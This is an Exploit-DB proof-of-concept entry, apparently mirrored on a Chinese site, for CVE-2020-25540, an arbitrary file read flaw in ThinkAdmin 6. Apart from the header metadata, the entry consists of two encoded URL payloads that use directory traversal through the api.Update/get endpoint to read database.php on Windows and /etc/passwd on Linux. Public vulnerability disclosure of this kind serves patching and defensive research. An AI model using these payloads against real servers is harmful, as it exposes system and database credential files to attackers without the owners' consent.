ThinkAdmin 6 – Arbitrarily File Read

  • 作者: Hzllaga
    日期: 2020-09-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/48812/
  • # Exploit Title: ThinkAdmin 6 -Arbitrarily File Read
    # Google Dork: N/A
    # Date: 2020-09-14
    # Exploit Author: Hzllaga
    # Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/
    # Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a
    # Version: v6 <= 2020.08.03.01
    # Tested on: PHP7.4.7,Apache
    # CVE : CVE-2020-25540
    
    PoC:
    On Windows read database.php payload:
    /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34
    
    On Linux read /etc/passwd payload:
    /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s